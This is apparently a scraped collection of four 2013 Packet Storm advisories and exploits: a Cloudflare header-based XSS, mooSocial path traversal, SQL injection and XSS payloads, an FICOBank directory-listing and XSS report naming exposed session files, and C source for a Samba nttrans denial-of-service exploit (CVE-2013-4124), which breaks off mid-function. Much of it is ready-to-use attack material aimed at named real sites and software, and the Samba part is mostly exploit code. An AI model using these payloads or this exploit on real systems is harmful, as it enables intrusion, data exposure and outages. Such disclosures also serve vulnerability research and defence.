Description : Cloudflare suffers from a cross site scripting vulnerability Author : Glenn Grant Source : Cloudflare Cross Site Scripting ? Packet Storm Code : Details below of an XSS vulnerability I discovered in Cloudflare (markdown format) - Glenn | /dev/alias * http://blog.devalias.net * http://devalias.net ----- **Reference Number:** DAHAX-2013-001 (/dev/alias/hacks 2013-001) **Notification Timeline:** * 10/07/2013, Request# 38713 ( https://support.cloudflare.com/anonymous_requests/new) * 10/07/2013, Vendor looking into issue * 16/07/2013, Updated vendor with new details (Length: 101 instead of 72) * 16/07/2013, Vendor requested that I test again * [No further response from vendor] * 01/08/2013, Tested again, vulnerability fixed **Details Published:** 14/08/2013 ( http://blog.devalias.net/post/58217238426/dahax-2013-001-cloudflare-xss-vulnerability ) ## What? * Reflected XSS (cross site scripting) attack ## Where's Affected? * Theoretically it seems that any page that uses cloudflare will be affected. - Eg: http://www.cloudflare.com/ ## How? * **To bring up the vulnerable page** - Set your X-Forwarded-For header to <del>72+</del> 101+ characters - <del>Eg: X-Forwarded-For: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHH</del> - Eg: <pre>X-Forwarded-For: AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDEEEEEEEEEEFFFFFFFFFFGGGGGGGGGGHHHHHHHHHHIIIIIIIIIIJJJJJJJJJJK</pre> - Load a site using cloudflare - You should end up on "DNS Points to Prohibited IP" page * **To trigger the XSS** - Set your User-Agent string to the XSS attack - Eg: <pre>User-Agent: USER-AGENT being tested for XSS..<script>alert('Vulnerable to XSS via USER-AGENT header [Found by devalias.net]')</script></pre> * **The whole attack** - Ensure your X-Forwarded-For and User-Agent headers are configured as above - Navigate to a page using cloudflare - ??? - Profit! ## Who? * Discovered by [Glenn '/dev/alias' Grant](http://www.devalias.net/) ( glenn@devalias.net) ## Responsible Disclosure Notice * Following in the footsteps of Google's vulnerability disclosure timeline, unless otherwise agreed to beforehand, I reserve the right to publicly announce the details of any discovered vulnerabilities 7 days post notification. * **Google's Rationale:** "Seven days is an aggressive timeline and may be too short for some vendors to update their products, but it should be enough time to publish advice about possible mitigations, such as temporarily disabling a service, restricting access, or contacting the vendor for more information. As a result, after 7 days have elapsed without a patch or advisory, we will support researchers making details available so that users can take steps to protect themselves. By holding ourselves to the same standard, we hope to improve both the state of web security and the coordination of vulnerability management." - [Google]( http://googleonlinesecurity.blogspot.com.au/2013/05/disclosure-timeline-for-vulnerabilities.html

Description : mooSocial version 1.3 suffers from cross site scripting and local file inclusion vulnerabilities. Author : Esac Source : mooSocial 1.3 Cross Site Scripting / Local File Inclusion ? Packet Storm Code : ########################################################################################### #Exploit Title: mooSocial 1.3 - Multiple Vulnerabilites #Official site: http://www.moosocial.com #Risk Level: High #Demo : http://demo.moosocial.com #Exploit Author: Esac #Homepage author : www.iss4m.ma #Last Checked: 22/08/2013 ########################################################################################### +----------+ | OVERVIEW | +----------+ mooSocial is a social networking script built on top of CakePHP 2 framework. It has all the features to build a successful community (e.g. blog, photo, group, event, video, topic...). mooSocial is a premium version { Standard Version : $149 Developer Version : $449 } +-----------------------------------------------------------------------------------+ +----------------------------+ | Directorty Traversal / LFI | +----------------------------+ mooSocial is vulnerable to a directory traversal / local file inclusion vulnerability , as a result, it was possible for an attacker to load webserver-readable files from the local filesystem (and to execute PHP stored on the server). +--------------------+ | How did it work? | +--------------------+ In the PHP code for de mooSocial website, there’s a controller called PagesController.php that is used to load static / semi-static pages. The exact name of the page to be loaded is determined by the query string: for example, http://www.demo.moosocial.com/pages/chat loads the Site chat page, which is stored as a template in the system. i used Burp suite tool to intercept data cuz there is redirection here when we put something else after the root path vuln code : ................... class PagesController extends AppController { public function display() { $path = func_get_args(); $count = count($path); if (!$count) { $this->redirect('/'); } $page = $subpage = $title_for_layout = null; if (!empty($path[0])) { $page = $path[0]; } if (!empty($path[1])) { $subpage = $path[1]; } if (!empty($path[$count - 1])) { $title_for_layout = Inflector::humanize($path[$count - 1]); } $this->set(compact('page', 'subpage', 'title_for_layout')); // check if site is offline $moo_setting = $this->_getSettings(); $uid = $this->Session->read('uid'); if ( !empty( $moo_setting['site_offline'] ) && !is_root_admin( $uid ) ) { $this->layout = ''; $this->set('offline_message', $moo_setting['offline_message']); $this->render('/Elements/misc/offline'); } else $this->render(implode('/', $path)); } } This code is vulnerable to a directory traversal attack: the $path, which is used to load a template, is directly tied to user input (the arguments to the function here are the elements of the query string). By sending URL slashes (/), it was possible to break out of the current directory and traverse via a relative path to any directory in the system. It was also possible to convince CakePHP (the framework used here) to load files without the ctp file extension associated with templates by including a URL null byte (%00) at the end of the URL. +------------------+ | PROOF OF CONCEPT | +------------------+ http://demo.moosocial.com/pages/../../../../../../../../../../etc/passwd%00 Requet Headers : GET /pages/../../../../../../../../../../etc/passwd%00 HTTP/1.1 Host: demo.moosocial.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Response Headers : HTTP/1.1 404 Not Found Date: Thu, 22 Aug 2013 04:56:29 GMT Server: Apache Set-Cookie: CAKEPHP=r7t684gq0po1spmqpp5634p2l3; expires=Thu, 22-Aug-2013 05:26:29 GMT; path=/ Content-Length: 37338 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Response Raw : //source code of the page ......................... root:x:0:0::/ramdisk/root:/ramdisk/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync ........................ +--------------------------------+ | Time-Based Blind Injection | +--------------------------------+ http://demo.moosocial.com/blogs/view/{Inject here} Real exploitation : http://demo.moosocial.com/blogs/view/1 and sleep(2) ==> will pause for 2 seconds and diplay the page after http://demo.moosocial.com/blogs/view/1 and sleep(10) ==> will pause for 10 seconds and diplay the page after +-----+ | XSS | +-----+ //all XSS tested on Mozila Firefox http://demo.moosocial.com/tags/view/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://demo.moosocial.com/albums/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://demo.moosocial.com/blogs/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://demo.moosocial.com/topics/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://demo.moosocial.com/groups/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' http://demo.moosocial.com/videos/ajax_browse/"><img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' //The input is reflected inside <script> tag between single quotes http://demo.moosocial.com/groups/view/10/video_id:'';!--'<XSS>=&{()} http://demo.moosocial.com/groups/view/10/topic_id:'';!--'<XSS>=&{()} XSS via Post method : POST /videos/ajax_embed HTTP/1.1 Content-Length: 75 Content-Type: application/x-www-form-urlencoded Cookie: CAKEPHP=u3e5q7ut90nhcg7ao1e9c8tni4; mooSocial[language]=Q2FrZQ%3D%3D.9%2F79; mooSocial[theme]=Q2FrZQ%3D%3D.%2FvHjC2hN; mooSocial[activity_feed]=Q2FrZQ%3D%3D.9%2Bb%2FFmVNBY8%3D Host: demo.moosocial.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* source=youtube&source_id=" onmouseover=prompt(976681) bad=" +--------------------------------------------------------------------------------------+ Knowledge is not an Object , it's a flaw Greetz : White Tarbouch TEAM - Cobra WwW.Iss4m.Ma ./Issam IEBOUBEN Aka Esac

Description : FICOBank suffers from exposed directory listing and cross site scripting vulnerabilities. They do not believe any of this is an issue and if you use them, you should change banks immediately. Author : Juan Carlos Garcia Source : FICOBank Information Disclosure / Cross Site Scripting ? Packet Storm Code : FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable Report-Timeline: ================ 23-08-2013 Advisory Response:"Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us. Thank you very much" ( /ME I don´t understand this response.. Is it a joke? ) 20-08-2013 Full Disclosure I-VULNERABILITY ------------------------- #Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable #Vendor:http://www.ficobank.com / http://ficobank.com #Author:Juan Carlos García (@secnight) #Follow me http://www.highsec.es Twitter:@secnight II-Introduction: ============= The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines. Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons, which represented the farmers who have limited resources and access to banking services. From a molehill-size cooperative rural bank that it opted to be, it elevated to a mountain-high cooperative bank, as it can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012). ------------------------- III-PROOF OF CONCEPT ==================== Attack details -------------- Directory Listing ***************** The web server is configured to display the list of files contained in this directory. This is not recommended because the directory may contain files that are not normally exposed through links on the web site.A user can view a list of all files from this directory possibly exposing sensitive information. Affected items http://ficobank.com/annualreport/ /annualreport /annualreport/_notes /annualreport/annualreport /Assets4Sale /Assets4Sale/a4sale /Assets4Sale/a4sale/_notes /contact /contact/_notes /contact/html-contact-form-captcha /contact/html-contact-form-captcha/_notes /contact/html-contact-form-captcha/scripts /contact/html-contact-form-captcha/scripts/_notes /contact/scripts /contact/scripts/_notes /contact/scripts-old /contact/scripts-old/_notes /DepositProducts /DepositProducts/_notes /Ficonnect /flash /flash/_notes /images /images/awards /images/images /images/jobopening /images/jobopening/_notes /images/officer /images/signature /images/signature/_notes /images/slides /Leadership /LoanProducts /news /news/_notes /OtherServices /OtherServices/_notes /scripts /scripts/_notes /Stylesheet /Stylesheet/_notes Temporary file/directory Affected items http://www.ficobank.com/tmp/ /tmp /tmp/mailError.log /tmp/sess_secnightsessionfixation /tmp/sess_b35e89c88df72a4c589a5a8e1a495594 /tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c /tmp/untitled File Lock These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique... http://www.ficobank.com/DepositProducts/ Cross Site Scripting **************** Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.An attacker can steal the session cookie and take over the account,impersonating the user.It is also possible to modify the content of the page presented to the user. Affected items /contact/contactus.php URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad=' The input is reflected inside a tag parameter between single quotes. Variant email(2) 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit Variant Name URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad=' The input is reflected inside a tag parameter between single quotes. POST /contact/contactus.php 6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit 6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit /contact/email.php URI was set to #" onmouseover=prompt(919235) // The input is reflected inside a tag parameter between double quotes. GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20// /contact/email.php.bak URI was set to #" onmouseover=prompt(994575) // GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20// /contact/email.php.BAK URI was set to #" onmouseover=prompt(924567) // The input is reflected inside a tag parameter between double quotes. GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20// /contact/html-contact-form-captcha/html-contact-form.php (4) URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad=' POST /contact/html-contact-form-captcha/html-contact-form.php 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit /contact/samplexyz.php (7) URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad=" POST /contact/samplexyz.php contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1 Variants contactname,email,subject /contact/samplexyz.php.bak URI was set to #" onmouseover=prompt(959358) // The input is reflected inside a tag parameter between double quotes. GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20// /contact/samplexyz.php.BAK URI was set to #" onmouseover=prompt(966989) // GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20// /contactus.php(4) Variant email, name email(3) URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad=' 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit name(1) URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad=' 6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit Jquery Old Version Vulnerable *************************** jQuery JavaScript Library v1.4.2 This problem was fixed in jQuery 1.6.3. This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability. Many sites are using to select elements using location.hash that allows someone to inject script into the page. $("#id") is css selector, $("<img>") is createElement, and $("#<img>") is createElement too. Affected items /OtherServices/fade.min.js GET /OtherServices/fade.min.js Response: HTTP/1.1 200 OK Date: Fri, 23 Aug 2013 15:48:45 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Age: 0 Connection: keep-alive Server: YTS/1.20.28 /OtherServices/jquery.fade.js GET /OtherServices/jquery.fade.js jquery_xss/#<img src=/ onerror=alert(1)> Response HTTP/1.1 200 OK Date: Fri, 23 Aug 2013 15:48:46 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Age: 0 Connection: keep-alive Server: YTS/1.20.28 Content-Length: 72174 /scripts/fade.min.js GET /scripts/fade.min.js Response HTTP/1.1 200 OK Date: Fri, 23 Aug 2013 15:48:46 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Age: 0 Connection: keep-alive Server: YTS/1.20.28 Content-Length: 72174 /scripts/jquery.fade.js GET scripts/jquery.fade.js Response The same.. IV. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García(@secnight) Special Thanks: Perseo V. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.

Description : Samba malformed nttrans smb packet remote denial of service exploit. This is the second version of this exploit that adds an automated offset and second argument. Author : x90c Source : Samba nttrans Denial Of Service ? Packet Storm Code : /* !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! CVE-2013-4124 samba dos exploit ---- [x90c@ubuntu samba_dos]$ ./samba_nttrans_exploit ___ ___ / _ \ / _ \ __ __| (_) || | | | ___ \ \/ / \__. || | | | / __| > < / / | |_| || (__ /_/\_\ /_/ \___/ \___| samba nttrans reply exploit samba nttrans reply exploit Usage: ./samba_exploit [target ip addr] <server name> ex) ./samba_exploit 10.0.1.16 ex) ./samba_exploit 10.0.1.16 MYSAMBA [x90c@ubuntu samba_dos]$ ---- * ... Description ...: I didn't test for the exploit yet, I copied another samba nttrans exploit in 2003 that http://www.securiteam.co m/exploits/5TP0M2AAKS.html. 1) the vul nerable data offset is automated from 0xffffffff to 0xf1000000 and can pass second argument for server name to make nbt session If pass target ip addr and server name to this exploit the samba will be dos! the exploit send malformed nttrans smb packet with large value of data offset and param offset 2) they are all of offset of nttrans struct to cause integer wrap in the vulnerable function of read_nttrns_ea_list It should be works because 1) 2) - exploit process: (1) smb negotiations (2) malformed smb nttrans packet within offset 0xffffffff ~ 0xf1000000 to integer wrap sent! (3) ...... samba dos! I left an article that analyzed it !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! x90c */ #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <errno.h> #include <string.h> #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <ctype.h> #include <signal.h> typedef unsigned char uint8; typedef unsigned short uint16; typedef unsigned long uint32; struct variable_data_header { uint8 wordcount, bytecount[2]; }; struct nbt_session_header { uint8 type, flags, len[2]; }; struct smb_base_header { uint8 protocol[4], command, errorclass, reserved, errorcode[2]; uint8 flags; uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2]; }; struct negprot_reply_header { uint8 wordcount; uint8 dialectindex[2]; uint8 securitymode; uint16 maxmpxcount, maxvccount; uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh; uint16 timezone; uint8 keylen; uint16 bytecount; }; struct sesssetupx_request_header { uint8 wordcount, command, reserved; uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2]; uint8 sessionid[4]; uint8 ipasswdlen[2], passwdlen[2]; uint8 reserved2[4], capabilities[4]; }; struct sesssetupx_reply_header { uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2]; }; struct tconx_request_header { uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2]; }; struct tconx_reply_header { uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2]; }; struct nttrans_request_header { uint8 wordcount; uint8 maxsetupcount; uint8 flags[2]; uint8 totalparamcount[4]; uint8 totaldatacount[4]; uint8 maxparamcount[4]; uint8 maxdatacount[4]; uint8 paramcount[4]; uint8 paramoffset[4]; // offset! uint8 datacount[4]; uint8 dataoffset[4]; // XXX the data offset vulnerable! uint8 setupcount; // nttrans struct doesn't have other offset uint8 function[2]; // field without them uint8 bytecount[2]; }; #define SMB_NEGPROT 0x72 #define SMB_SESSSETUPX 0x73 #define SMB_TCONX 0x75 #define SMB_TRANS2 0x32 #define SMB_NTTRANS 0xA0 #define SMB_NTTRANSCREATE 0x01 #define SMB_TRANS2OPEN 0x00 #define SMB_SESSIONREQ 0x81 #define SMB_SESSION 0x00 uint32 sessionid, PARAMBASE = 0x81c0000; char *tconx_servername; int tid, pid, uid; #define STACKBOTTOM 0xbfffffff #define STACKBASE 0xbfffd000 #define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE)) char *netbios_encode_name(char *name, int type) { char plainname[16], c, *encoded, *ptr; int i, len = strlen(name); if ((encoded = malloc(34)) == NULL) { fprintf(stderr, "malloc() failed\n"); exit(-1); } ptr = encoded; strncpy(plainname, name, 15); *ptr++ = 0x20; for (i = 0; i < 16; i++) { if (i == 15) c = type; else { if (i < len) c = toupper(plainname[i]); else c = 0x20; } *ptr++ = (((c >> 4) & 0xf) + 0x41); *ptr++ = ((c & 0xf) + 0x41); } *ptr = '\0'; return encoded; } void construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len) { struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr; uint16 nlen; // geen idee of dit de juiste manier is, maar 't lijkt wel te werken .. if (len > 65535) nlen = 65535; else nlen = htons(len); memset((void *)nbt_hdr, '\0', sizeof (struct nbt_session_header)); nbt_hdr->type = type; nbt_hdr->flags = flags; memcpy(&nbt_hdr->len, &nlen, sizeof (uint16)); } // caller zorgt voor juiste waarde van ptr. void construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, uint16 uid, uint16 mid) { struct smb_base_header *base_hdr = (struct smb_base_header *)ptr; memset(base_hdr, '\0', sizeof (struct smb_base_header)); memcpy(base_hdr->protocol, "\xffSMB", 4); base_hdr->command = command; base_hdr->flags = flags; memcpy(&base_hdr->flags2, &flags2, sizeof (uint16)); memcpy(&base_hdr->tid, &tid, sizeof (uint16)); memcpy(&base_hdr->pid, &pid, sizeof (uint16)); memcpy(&base_hdr->uid, &uid, sizeof (uint16)); memcpy(base_hdr->mid, &mid, sizeof (uint16)); } void construct_sesssetupx_header(char *ptr) { struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr; uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0; uint32 capabilities = 0x50; memset(sx_hdr, '\0', sizeof (struct sesssetupx_request_header)); sx_hdr->wordcount = 13; sx_hdr->command = 0xff; memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16)); memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16)); memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16)); memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32)); memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16)); memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16)); memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32)); } /* struct tconx_request_header { uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2]; -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[]; }; */ void construct_tconx_header(char *ptr) { struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr; uint16 passwdlen = 1, bytecount; char *data; memset(tx_hdr, '\0', sizeof (struct tconx_request_header)); bytecount = strlen(tconx_servername) + 15; if ((data = malloc(bytecount)) == NULL) { fprintf(stderr, "malloc() failed, aborting!\n"); exit(-1); } memcpy(data, "\x00\x5c\x5c", 3); memcpy(data + 3, tconx_servername, strlen(tconx_servername)); memcpy(data + 3 + strlen(tconx_servername), "\x5cIPC\x24\x00\x3f\x3f\x3f\x3f\x3f\x00", 12); tx_hdr->wordcount = 4; tx_hdr->xcommand = 0xff; memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16)); memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16)); memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount); } void nbt_session_request(int fd, char *clientname, char *servername) { char *cn, *sn; char packet[sizeof (struct nbt_session_header) + (34 * 2)]; construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header)); tconx_servername = servername; sn = netbios_encode_name(servername, 0x20); cn = netbios_encode_name(clientname, 0x00); memcpy(packet + sizeof (struct nbt_session_header), sn, 34); memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34); write(fd, packet, sizeof (packet)); close(fd); free(cn); free(sn); } void process_nbt_session_reply(int fd) { struct nbt_session_header nbt_hdr; char *errormsg; uint8 errorcode; int size, len = 0; if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1) { close(fd); fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } if (size != sizeof (nbt_hdr)) { close(fd); fprintf(stderr, "read() a broken packet, aborting.\n"); exit(-1); } memcpy(&len, &nbt_hdr.len, sizeof (uint16)); if (len) { read(fd, (void *)&errorcode, 1); close(fd); switch (errorcode) { case 0x80 : errormsg = "Not listening on called name"; break; case 0x81 : errormsg = "Not listening for calling name"; break; case 0x82 : errormsg = "Called name not present"; break; case 0x83 : errormsg = "Called name present, but insufficient resources"; break; case 0x8f : errormsg = "Unspecified error"; break; default : errormsg = "Unspecified error (unknown error code received!)"; break; } fprintf(stderr, "session request denied, reason: '%s' (code %i)\n", errormsg, errorcode); exit(-1); } printf("session request granted\n"); } void negprot_request(int fd) { struct variable_data_header data; char dialects[] = "\x2PC NETWORK PROGRAM 1.0\x0\x2MICROSOFT NETWORKS 1.03\x0\x2MICROSOFT NETWORKS 3.0\x0\x2LANMAN1.0\x0" \ "\x2LM1.2X002\x0\x2Samba\x0\x2NT LANMAN 1.0\x0\x2NT LM 0.12\x0\x2""FLATLINE'S KWAADWAAR"; char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)]; int dlen = htons(sizeof (dialects)); memset(&data, '\0', sizeof (data)); construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header)); pid = getpid(); construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1); memcpy(&data.bytecount, &dlen, sizeof (uint16)); memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data)); memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), dialects, sizeof (dialects)); if (write(fd, packet, sizeof (packet)) == -1) { close(fd); fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } } void process_negprot_reply(int fd) { struct nbt_session_header *nbt_hdr; struct smb_base_header *base_hdr; struct negprot_reply_header *np_reply_hdr; char packet[1024]; int size; uint16 pid_reply; nbt_hdr = (struct nbt_session_header *)packet; base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header)); np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header))); if ((size = read(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16)); memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32)); if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid) { close(fd); fprintf(stderr, "protocol negotiation failed\n"); exit(-1); } printf("protocol negotiation complete\n"); } void sesssetupx_request(int fd) { uint8 data[] = "\x12\x0\x0\x0\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61"; char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct sesssetupx_request_header) + sizeof (data)]; int size; construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header)); construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1); construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct sesssetupx_request_header), &data, sizeof (data)); if ((size = write(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } if (size != sizeof (packet)) { close(fd); fprintf(stderr, "couldn't write entire packet, aborting!\n"); exit(-1); } } void process_sesssetupx_reply(int fd) { struct nbt_session_header *nbt_hdr; struct smb_base_header *base_hdr; struct sesssetupx_reply_header *sx_hdr; char packet[1024]; int size, len; if ((size = read(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } nbt_hdr = (struct nbt_session_header *)packet; base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header)); sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); memcpy(&len, &nbt_hdr->len, sizeof (uint16)); memcpy(&uid, &base_hdr->uid, sizeof (uint16)); if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3) { close(fd); fprintf(stderr, "session setup failed\n"); exit(-1); } printf("session setup complete, got assigned uid %i\n", uid); } void tconx_request(int fd) { char *packet; int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15; if ((packet = malloc(pktsize)) == NULL) { close(fd); fprintf(stderr, "malloc() failed, aborting!\n"); exit(-1); } construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header)); construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1); construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); if ((size = write(fd, packet, pktsize)) == -1) { close(fd); fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } free(packet); if (size != pktsize) { close(fd); fprintf(stderr, "couldn't write entire packet, aborting!\n"); exit(-1); } } void process_tconx_reply(int fd) { struct nbt_session_header *nbt_hdr; struct smb_base_header *base_hdr; struct tconx_reply_header *tx_hdr; char packet[1024]; int size, bytecount; if ((size = read(fd, packet, sizeof (packet))) == -1) { close(fd); fprintf(stderr, 